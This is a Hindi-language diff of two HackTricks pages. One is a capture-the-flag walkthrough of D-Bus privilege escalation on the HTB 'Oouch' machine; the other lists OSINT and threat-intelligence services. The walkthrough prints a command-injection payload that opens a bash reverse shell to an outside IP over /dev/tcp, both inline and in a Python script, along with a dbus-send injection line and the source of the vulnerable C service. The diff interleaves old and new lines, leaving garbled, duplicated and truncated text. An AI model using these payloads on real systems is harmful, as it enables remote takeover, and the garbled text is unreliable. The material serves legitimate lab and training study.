फिर, आप इंटरफेस के बारे में कुछ जानकारी प्राप्त कर सकते हैं:
```bash ```bash
busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface
@ -119,11 +134,9 @@ cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read cap_wake_alarm cap_block_suspend cap_audit_read
``` ```
### सेवा ऑब्जेक्ट के इंटरफेस सूची
### सेवा ऑब्जेक्ट के इंटरफेस की सूची बनाएं
आपको पर्याप्त अनुमतियाँ होनी चाहिए। आपको पर्याप्त अनुमतियाँ होनी चाहिए।
```bash ```bash
busctl tree htb.oouch.Block #Get Interfaces of the service object busctl tree htb.oouch.Block #Get Interfaces of the service object
@ -131,11 +144,9 @@ busctl tree htb.oouch.Block #Get Interfaces of the service object
└─/htb/oouch └─/htb/oouch
└─/htb/oouch/Block └─/htb/oouch/Block
``` ```
### सेवा ऑब्जेक्ट का इंट्रोस्पेक्ट इंटरफेस ### सेवा ऑब्जेक्ट का इंट्रोस्पेक्ट इंटरफेस
ध्यान दें कि इस उदाहरण में `tree` पैरामीटर का उपयोग करके नवीनतम इंटरफेस का चयन किया गया था (_पिछले खंड देखें_): ध्यान दें कि इस उदाहरण में `tree` पैरामीटर का उपयोग करके नवीनतम इंटरफेस का चयन किया गया था (_पिछले खंड देखें_):
```bash ```bash
busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface
@ -153,27 +164,23 @@ org.freedesktop.DBus.Properties interface - - -
.Set method ssv - - .Set method ssv - -
.PropertiesChanged signal sa{sv}as - - .PropertiesChanged signal sa{sv}as - -
``` ```
### मॉनिटर/कैप्चर इंटरफेस ### मॉनिटर/कैप्चर इंटरफेस
पर्याप्त विशेषाधिकारों के साथ (केवल `send_destination` और `receive_sender` विशेषाधिकार ही काफी नहीं हैं) आप **एक डी-बस संचार को मॉनिटर** कर सकते हैं। पर्याप्त विशेषाधिकारों के साथ (केवल `send_destination` और `receive_sender` विशेषाधिकार पर्याप्त नहीं हैं) आप **एक डी-बस संचार को मॉनिटर** कर सकते हैं।
**संचार** को **मॉनिटर** करने के लिए आपको **रूट** होना होगा। अगर फिर भी रूट होने में समस्या हो तो [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) और [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) देखें। **संचार** को **मॉनिटर** करने के लिए आपको **रूट** होना चाहिए। अगर आप फिर भी रूट होने में समस्या आ रही है तो [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) और [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) देखें।
{% hint style="warning" %} {% hint style="warning" %}
अगर आपको पता है कि एक डी-बस कॉन्फ़िग फ़ाइल को कैसे कॉन्फ़िगर करें ताकि **गैर रूट उपयोगकर्ताओं को स्निफ़ करने** की अनुमति हो, तो कृपया **मुझसे संपर्क करें**! अगर आप जानते हैं कि एक डी-बस कॉन्फ़िग फ़ाइल को कैसे कॉन्फ़िगर करें ताकि **गैर रूट उपयोगकर्ताओं को स्निफ़ करने** की अनुमति हो, तो कृपया **मुझसे संपर्क करें**!
{% endhint %} {% endhint %}
मॉनिटर करने के विभिन्न तरीके: मॉनिटर करने के विभिन्न तरीके:
```bash ```bash
sudo busctl monitor htb.oouch.Block #Monitor only specified sudo busctl monitor htb.oouch.Block #Monitor only specified
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see
``` ```
In the following example the interface `htb.oouch.Block` is monitored and **the message "**_**lalalalal**_**" is sent through miscommunication**:
**निम्नलिखित उदाहरण में इंटरफेस `htb.oouch.Block` को मॉनिटर किया जाता है और संदेश "\_**lalalalal**\_**" गलत संचार के माध्यम से भेजा जाता है\*\*:
```bash ```bash
busctl monitor htb.oouch.Block busctl monitor htb.oouch.Block
@ -192,17 +199,13 @@ MESSAGE "s" {
STRING "Carried out :D"; STRING "Carried out :D";
}; };
``` ```
#### सभी शोर को फ़िल्टर करना <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a> #### सभी शोर को फ़िल्टर करना <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a>
अगर बस पर बहुत सारी जानकारी है, तो इस तरह से एक मैच नियम पास करें: अगर बस पर बहुत सारी जानकारी है, तो ऐसे ही एक मैच नियम पास करें:
```bash ```bash
dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'" dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"
``` ```
एकाधिक नियम निर्दिष्ट किए जा सकते हैं। यदि संदेश में से किसी भी नियम से मेल खाता है, तो संदेश प्रिंट किया जाएगा। इस प्रकार:
Multiple नियम निर्दिष्ट किए जा सकते हैं। यदि संदेश में से किसी भी नियम से मेल खाता है, तो संदेश प्रिंट किया जाएगा। इस प्रकार:
```bash ```bash
dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends" dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
``` ```
@ -210,17 +213,15 @@ dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
```bash ```bash
dbus-monitor "type=method_call" "type=method_return" "type=error" dbus-monitor "type=method_call" "type=method_return" "type=error"
``` ```
अधिक जानकारी के लिए [D-Bus दस्तावेज़ीकरण](http://dbus.freedesktop.org/doc/dbus-specification.html) देखें। अधिक जानकारी के लिए [D-Bus दस्तावेज़ीकरण](http://dbus.freedesktop.org/doc/dbus-specification.html) देखें।
### अधिक ### अधिक
`busctl` के पास और भी विकल्प हैं, [**उन सभी को यहाँ ढूंढें**](https://www.freedesktop.org/software/systemd/man/busctl.html)। `busctl` के पास और भी विकल्प हैं, [**उन सभी को यहाँ खोजें**](https://www.freedesktop.org/software/systemd/man/busctl.html)।
## **भेद्य स्थिति** ## **भेद्य स्थिति**
उपयोगकर्ता **qtc एचटीबी से "oouch" में** एक **अप्रत्याशित डी-बस कॉन्फ़िग फ़ाइल** खोज सकते हैं जो _/etc/dbus-1/system.d/htb.oouch.Block.conf_ में स्थित है। उपयोगकर्ता **qtc एचटीबी से "oouch" में** एक **अप्रत्याशित डी-बस कॉन्फ़िग फ़ाइल** खोज सकते हैं जो _/etc/dbus-1/system.d/htb.oouch.Block.conf_ में स्थित है।
```xml ```xml
<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- --> <?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
@ -241,11 +242,9 @@ dbus-monitor "type=method_call" "type=method_return" "type=error"
</busconfig> </busconfig>
``` ```
नोट: पिछले कॉन्फ़िगरेशन से ध्यान दें कि **आपको इस D-BUS संचार के माध्यम से जानकारी भेजने और प्राप्त करने के लिए उपयोगकर्ता `root` या `www-data` होना आवश्यक** है। नोट: पिछले कॉन्फ़िगरेशन से ध्यान दें कि **आपको इस D-BUS संचार के माध्यम से जानकारी भेजने और प्राप्त करने के लिए उपयोगकर्ता `root` या `www-data` होना आवश्यक** है।
उपयोगकर्ता **qtc** डॉकर कंटेनर **aeb4525789d8** के अंदर आपको फ़ाइल _/code/oouch/routes.py_ में कुछ dbus संबंधित कोड मिल सकता है। यह दिलचस्प कोड है: उपयोगकर्ता **qtc** डॉकर कंटेनर **aeb4525789d8** के अंदर आपको फ़ाइल _/code/oouch/routes.py_ में कुछ dbus संबंधित कोड मिल सकता है। यह दिलचस्प कोड है:
```python ```python
if primitive_xss.search(form.textfield.data): if primitive_xss.search(form.textfield.data):
bus = dbus.SystemBus() bus = dbus.SystemBus()
@ -257,16 +256,14 @@ response = block_iface.Block(client_ip)
bus.close() bus.close()
return render_template('hacker.html', title='Hacker') return render_template('hacker.html', title='Hacker')
``` ```
जैसा कि आप देख सकते हैं, यह **एक D-Bus इंटरफेस से कनेक्ट कर रहा है** और "ब्लॉक" फ़ंक्शन को "client\_ip" को भेज रहा है।
जैसा कि आप देख सकते हैं, यह **एक D-Bus इंटरफेस से कनेक्ट कर रहा है** और **"Block" फ़ंक्शन** को "client\_ip" को भेज रहा है। D-Bus कनेक्शन के दूसरी ओर कुछ C संकलित बाइनरी चल रहा है। यह कोड D-Bus कनेक्शन में **IP पते के लिए सुनवाई कर रहा है और `system` फ़ंक्शन के माध्यम से iptables को कॉल कर रहा है**।\
**`system` कोमांड इंजेक्शन के लिए उद्देश्यपूर्ण रूप से वंशावली है**, इसलिए निम्नलिखित पेलोड एक रिवर्स शैल बनाएगा: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
D-Bus कनेक्शन के दूसरी ओर कुछ C संकलित बाइनरी चल रहा है। यह कोड D-Bus कनेक्शन में **IP पता सुन रहा है और `system` फ़ंक्शन के माध्यम से iptables को कॉल कर रहा है** दिए गए IP पते को ब्लॉक करने के लिए।\ ### इसका शिकार बनें
**`system` कोमांड इंजेक्शन के लिए उद्देश्यपूर्ण रूप से वंशावलोकनयोग्य है**, इसलिए निम्नलिखित पेलोड एक रिवर्स शैल बनाएगा: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
### इसका शीघ्रफलन करें
इस पृष्ठ के अंत में आप **D-Bus एप्लिकेशन का पूरा C कोड** पा सकते हैं। इसके अंदर आप 91-97 लाइनों के बीच **कैसे `D-Bus ऑब्जेक्ट पथ`** और `इंटरफेस नाम` **रजिस्टर किए गए हैं** यह जानकारी D-Bus कनेक्शन में जानकारी भेजने के लिए आवश्यक होगी: इस पृष्ठ के अंत में आप **D-Bus एप्लिकेशन का पूरा C कोड** पा सकते हैं। इसके अंदर आप 91-97 लाइनों के बीच **कैसे `D-Bus ऑब्जेक्ट पथ`** और `इंटरफेस नाम` **रजिस्टर किए गए हैं** यह जानकारी D-Bus कनेक्शन में जानकारी भेजने के लिए आवश्यक होगी:
```c ```c
/* Install the object */ /* Install the object */
r = sd_bus_add_object_vtable(bus, r = sd_bus_add_object_vtable(bus,
@ -276,17 +273,13 @@ r = sd_bus_add_object_vtable(bus,
block_vtable, block_vtable,
NULL); NULL);
``` ```
Also, in line 57 you can find that **केवल वह विधि पंजीकृत** है जिसके लिए इस D-Bus संचार के लिए बुलाया जाता है `Block`(_**इसलिए इसके अगले खंड में पेलोड सेवा ऑब्जेक्ट `htb.oouch.Block`, इंटरफेस `/htb/oouch/Block` और विधि नाम `Block` पर भेजे जाएंगे**_):
भी, पंक्ति 57 में आपको पाया जाता है कि **इस D-Bus संचार के लिए पंजीकृत केवल एक विधि** को `Block` कहा जाता है (_**इसलिए आगामी खंड में पेलोड को सेवा ऑब्जेक्ट `htb.oouch.Block`, इंटरफेस `/htb/oouch/Block` और विधि नाम `Block` पर भेजा जाएगा**_):
```c ```c
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
``` ```
#### Python #### Python
निम्नलिखित पायथन कोड D-Bus कनेक्शन में `Block` विधि को `block_iface.Block(runme)` के माध्यम से भेजेगा (_ध्यान दें कि यह पिछले कोड खंड से निकाला गया था_): निम्नलिखित पायथन कोड D-Bus कनेक्शन में `Block` विधि को `block_iface.Block(runme)` के माध्यम से पेलोड भेजेगा (_ध्यान दें कि यह पिछले कोड खंड से निकाला गया था_):
```python ```python
import dbus import dbus
bus = dbus.SystemBus() bus = dbus.SystemBus()
@ -296,20 +289,22 @@ runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #"
response = block_iface.Block(runme) response = block_iface.Block(runme)
bus.close() bus.close()
``` ```
#### busctl और dbus-send #### busctl और dbus-send
```bash ```bash
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #' dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
``` ```
* `dbus-send` एक उपकरण है जो "संदेश बस" को भेजने के लिए उपयोग किया जाता है।
* संदेश बस - एक सॉफ्टवेयर जो सिस्टम द्वारा एप्लिकेशन्स के बीच संचार को आसान बनाने के लिए उपयोग किया जाता है। यह संदेश कतार (संदेश क्रम में क्रमबद्ध होते हैं) से संबंधित है, लेकिन संदेश बस में संदेशों को एक सब्सक्रिप्शन मॉडल में भेजा जाता है और यह बहुत तेज होता है।
* "-system" टैग का उपयोग इसे एक सिस्टम संदेश के रूप में उल्लेखित करने के लिए किया जाता है, न कि एक सत्र संदेश (डिफ़ॉल्ट रूप से)।
* "--print-reply" टैग हमारे संदेश को उचित रूप में प्रिंट करने और मानव-पठनीय स्वरूप में किसी भी जवाब को प्राप्त करने के लिए उपयोग किया जाता है।
* "--dest=Dbus-Interface-Block" Dbus इंटरफेस का पता।
* "--string:" - हमें इंटरफेस को भेजने के लिए प्रकार का संदेश पसंद है। संदेश भेजने के कई प्रारूप हैं जैसे डबल, बाइट्स, बूलियन, इंट, ऑब्जपथ। इनमें से, "ऑब्जेक्ट पथ" उपयोगी होता है जब हम Dbus इंटरफेस को एक फ़ाइल के पथ को भेजना चाहते हैं। इस मामले में हम इंटरफेस को एक फ़ाइल के नाम में एक कमांड पास करने के लिए एक विशेष फ़ाइल (FIFO) का उपयोग कर सकते हैं। "string:;" - यह फिर से ऑब्जेक्ट पथ को बुलाने के लिए है जहां हम FIFO रिवर्स शैल फ़ाइल/कमांड की जगह रखते हैं।
* `dbus-send` एक उपकरण है जिसका उपयोग "संदेश बस" को संदेश भेजने के लिए किया जाता है। _ध्यान दें कि `htb.oouch.Block.Block` में पहला हिस्सा (`htb.oouch.Block`) सेवा ऑब्जेक्ट को संदर्भित करता है और आखिरी हिस्सा (`.Block`) विधि का नाम संदर्भित करता है।_
* संदेश बस - एक सॉफ्टवेयर जो सिस्टमों द्वारा एप्लिकेशन्स के बीच संचार को आसान बनाने के लिए उपयोग किया जाता है। यह संदेश कतार (संदेश क्रम में क्रमबद्ध होते हैं) से संबंधित है, लेकिन संदेश बस में संदेशों को एक सब्सक्रिप्शन मॉडल में भेजा जाता है और यह बहुत तेज होता है।
* "-system" टैग का उपयोग करना इसे उल्लेखित करने के लिए किया जाता है कि यह एक सिस्टम संदेश है, डिफ़ॉल्ट रूप से एक सत्र संदेश नहीं।
* "--print-reply" टैग का उपयोग हमारे संदेश को उचित रूप से प्रिंट करने और मानव-पठनीय प्रारूप में किसी भी जवाब को प्राप्त करने के लिए किया जाता है।
* "--dest=Dbus-Interface-Block" - Dbus इंटरफेस का पता।
* "--string:" - हमें इंटरफेस को भेजने के लिए एसंदेश का प्रकार। संदेश भेजने के कई प्रारूप हैं जैसे डबल, बाइट्स, बूलियन, इंटीजर, ऑब्जपथ। इनमें से, "ऑब्ज
### सी कोड
{% code title="d-bus_server.c" %}
```c ```c
//sudo apt install pkgconf //sudo apt install pkgconf
//sudo apt install libsystemd-dev //sudo apt install libsystemd-dev
@ -450,21 +445,22 @@ sd_bus_unref(bus);
return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
} }
``` ```
{% endcode %}
## संदर्भ ## संदर्भ
* [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) * [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,148 +1,137 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs संग्रह**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details> </details>
{% endhint %}
# [ProjectHoneypot](https://www.projecthoneypot.org/) # [ProjectHoneypot](https://www.projecthoneypot.org/)
आप पूछ सकते हैं कि क्या कोई IP संदिग्ध/दुर्भावनापूर्ण गतिविधियों से संबंधित है। पूरी तरह से मुफ्त। आप पूछ सकते हैं कि क्या किसी IP संदिग्ध/दुष्ट गतिविधियों से संबंधित है। पूरी तरह से मुफ्त।
# [**BotScout**](http://botscout.com/api.htm) # [**BotScout**](http://botscout.com/api.htm)
जांचें कि क्या IP पता बॉट से संबंधित है जो खाते रजिस्टर करता है। यह उपयोगकर्ता नाम और ईमेल की भी जांच कर सकता है। प्रारंभ में मुफ्त। जांचें कि क्या IP पता संदिग्ध गतिविधियों से संबंधित है जो खाते रजिस्टर करते हैं। यह उपयोगकर्ता नाम और ईमेल भी जांच सकता है। प्रारंभिक रूप से मुफ्त।
# [Hunter](https://hunter.io/) # [Hunter](https://hunter.io/)
ईमेल खोजें और सत्यापित करें। ईमेल खोजें और सत्यापित करें।
कुछ मुफ्त API अनुरोध मुफ्त, अधिक के लिए आपको भुगतान करना होगा। कुछ मुफ्त API अनुरोध मुफ्त हैं, अधिक के लिए आपको भुगतान करना होगा।
व्यावसायिक? व्यावसायिक?
# [AlientVault](https://otx.alienvault.com/api) # [AlientVault](https://otx.alienvault.com/api)
IP और डोमेन से संबंधित दुर्भावनापूर्ण गतिविधियों का पता लगाएं। मुफ्त। IPs और डोमेन्स से जुड़ी दुष्ट गतिविधियों को खोजें। मुफ्त।
# [Clearbit](https://dashboard.clearbit.com/) # [Clearbit](https://dashboard.clearbit.com/)
ईमेल से संबंधित व्यक्तिगत डेटा खोजें \(अन्य प्लेटफॉर्मों पर प्रोफाइल\), डोमेन \(कंपनी की मूल जानकारी, मेल और काम करने वाले लोग\) और कंपनियां \(मेल से कंपनी की जानकारी प्राप्त करें\)। ईमेल \(अन्य प्लेटफॉर्मों पर प्रोफाइल\), डोमेन \(मूल व्यापार सूचना, मेल और काम करने वाले लोग\) और कंपनियों \(मेल से कंपनी की जानकारी प्राप्त करें\) से संबंधित व्यक्तिगत डेटा खोजें
सभी संभावनाओं तक पहुंचने के लिए आपको भुगतान करना होगा। आपको सभी संभावनाओं तक पहुंचने के लिए भुगतान करना होगा।
व्यावसायिक? व्यावसायिक?
# [BuiltWith](https://builtwith.com/) # [BuiltWith](https://builtwith.com/)
वेब द्वारा प्रयुक्त प्रौद्योगिकियां। महंगा... वेब्स द्वारा उपयोग की जाने वाली तकनीक। महंगा...
व्यावसायिक? व्यावसायिक?
# [Fraudguard](https://fraudguard.io/) # [Fraudguard](https://fraudguard.io/)
जांचें कि क्या कोई होस्ट \(डोमेन या IP\) संदिग्ध/दुर्भावनापूर्ण गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है। जांचें कि क्या क होस्ट \(डोमेन या IP\) संदिग्ध/दुष्ट गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है।
व्यावसायिक? व्यावसायिक?
# [FortiGuard](https://fortiguard.com/) # [FortiGuard](https://fortiguard.com/)
जांचें कि क्या कोई होस्ट \(डोमेन या IP\) संदिग्ध/दुर्भावनापूर्ण गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है। जांचें कि क्या क होस्ट \(डोमेन या IP\) संदिग्ध/दुष्ट गतिविधियों से संबंधित है। कुछ मुफ्त API पहुंच है।
# [SpamCop](https://www.spamcop.net/) # [SpamCop](https://www.spamcop.net/)
यह दर्शाता है कि क्या होस्ट स्पैम गतिविधि से संबंधित है। कुछ मुफ्त API पहुंच है। सूचित करता है कि क्या होस्ट स्पैम गतिविधि से संबंधित है। कुछ मुफ्त API पहुंच है।
# [mywot](https://www.mywot.com/) # [mywot](https://www.mywot.com/)
राय और अन्य मेट्रिक्स के आधार पर यह पता लगाएं कि क्या कोई डोमेन संदिग्ध/दुर्भावनापूर्ण जानकारी से संबंधित है। रायों और अन्य मैट्रिक्स के आधार पर देखें कि क्या एक डोमेन संदिग्ध/दुष्ट जानकारी से संबंधित है।
# [ipinfo](https://ipinfo.io/) # [ipinfo](https://ipinfo.io/)
एक IP पते से मूलभूत जानकारी प्राप्त करें। आप प्रति माह 100K तक परीक्षण कर सकते हैं। एक IP पते से मूलिक जानकारी प्राप्त करें। आप 100K/महीने तक परीक्षण कर सकते हैं।
# [securitytrails](https://securitytrails.com/app/account) # [securitytrails](https://securitytrails.com/app/account)
यह मंच डोमेन और IP पतों के बारे में जानकारी देता है जैसे कि एक IP या डोमेन सर्वर के अंदर डोमेन, एक ईमेल द्वारा स्वामित्व वाले डोमेन \(संबंधित डोमेन खोजें\), डोमेन के IP इतिहास \(CloudFlare के पीछे के होस्ट का पता लगाएं\), एक नामसर्वर का उपयोग करने वाले सभी डोमेन.... यह प्लेटफॉर्म डोमेन और IP पतों के बारे में जानकारी देता है जैसे कि एक IP के अंदर डोमेन, डोमेन सर्वर के अंदर डोमेन, एक ईमेल द्वारा स्वामित डोमेन \(संबंधित डोमेन खोजें\), डोमेनों का IP इतिहास \(क्लाउडफ्लेयर के पीछे होस्ट खोजें\), एक नेमसर्वर का उपयोग करने वाले सभी डोमेन....
आपके पास कुछ मुफ्त पहुंच है। आपके पास कुछ मुफ्त पहुंच है।
# [fullcontact](https://www.fullcontact.com/) # [fullcontact](https://www.fullcontact.com/)
ईमेल, डोमेन या कंपनी का नाम खोजने की अनुमति देता है और "व्यक्तिगत" संबंधित जानकारी प्राप्त करता है। यह ईमेल भी सत्यापित कर सकता है। कुछ मुफ्त पहुंच है। ईमेल, डोमेन या कंपनी के नाम से खोज करने और संबंधित "व्यक्तिगत" जानकारी प्राप्त करने की अनुमति देता है। यह ईमेल सत्यापित कर सकता है। कुछ मुफ्त पहुंच है।
# [RiskIQ](https://www.spiderfoot.net/documentation/) # [RiskIQ](https://www.spiderfoot.net/documentation/)
डोमेन और IPs से संबंधित बहुत सारी जानकारी यहां तक कि मुफ्त/समुदायिक संस्करण में भी। डोमेन्स और IPs से बहुत सारी जानकारी मुफ्त/समुदाय संस्करण में भी।
# [\_IntelligenceX](https://intelx.io/) # [\_IntelligenceX](https://intelx.io/)
डोमेन, IPs और ईमेल खोजें और डंप से जानकारी प्राप्त करें। कुछ मुफ्त पहुंच है। खोजें डोमेन, IPs और ईमेल और डंप से जानकारी प्राप्त करें। कुछ मुफ्त पहुंच है।
# [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/) # [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
IP द्वारा खोजें और संदेहास्पद गतिविधियों से संबंधित जानकारी एकत्र करें। कुछ मुफ्त पहुंच है। IP द्वारा खोजें और संदिग्ध गतिविधियों से संबंधित जानकारी एकत्र करें। कुछ मुफ्त पहुंच है।
# [Greynoise](https://viz.greynoise.io/) # [Greynoise](https://viz.greynoise.io/)
IP या IP रेंज द्वारा खोजें और इंटरनेट स्कैन करने वाले IPs के बारे में जानकारी प्राप्त करें। 15 दिनों की मुफ्त पहुंच। IP या IP रेंज द्वारा खोजें और इंटरनेट स्कैन करने वाले IPs के बारे में जानकारी प्राप्त करें। 15 दिन मुफ्त पहुंच है
# [Shodan](https://www.shodan.io/) # [Shodan](https://www.shodan.io/)
एक IP पते की स्कैन जानकारी प्राप्त करें। कुछ मुफ्त api पहुंच है। एक IP पते की स्कैन जानकारी प्राप्त करें। कुछ मुफ्त एपीआई पहुंच है।
# [Censys](https://censys.io/) # [Censys](https://censys.io/)
Shodan के समान बहुत ही समान शोडन के बहुत ही समान
# [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/) # [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
कीवर्ड द्वारा खोज करके खुले S3 बकेट्स खोजें खोजें खोले गए S3 बकेट्स जिन्हें शब्दों द्वारा खोजा जा सकता है
# [Dehashed](https://www.dehashed.com/data) # [Dehashed](https://www.dehashed.com/data)
ईमेल और यहां तक कि डोमेन की लीक हुई साख प्राप्त करें ईमेल और डोमेन के लीक हुए क्रेडेंशियल्स खोजें
व्यावसायिक? व्यावसायिक?
# [psbdmp](https://psbdmp.ws/) # [psbdmp](https://psbdmp.ws/)
पेस्टबिन्स खोजें जहां एक ईमेल दिखाई दिया। व्यावसायिक? खोजें पास्टबिन्स जहां एक ईमेल प्रकट हुआ।
व्यावसायिक?
# [emailrep.io](https://emailrep.io/key) # [emailrep.io](https://emailrep.io/key)
एक मेल की प्रतिष्ठा प्राप्त करें। व्यावसायिक? एक मेल की प्रतिष्ठा प्राप्त करें।
व्यावसायिक?
# [ghostproject](https://ghostproject.fr/) # [ghostproject](https://ghostproject.fr/)
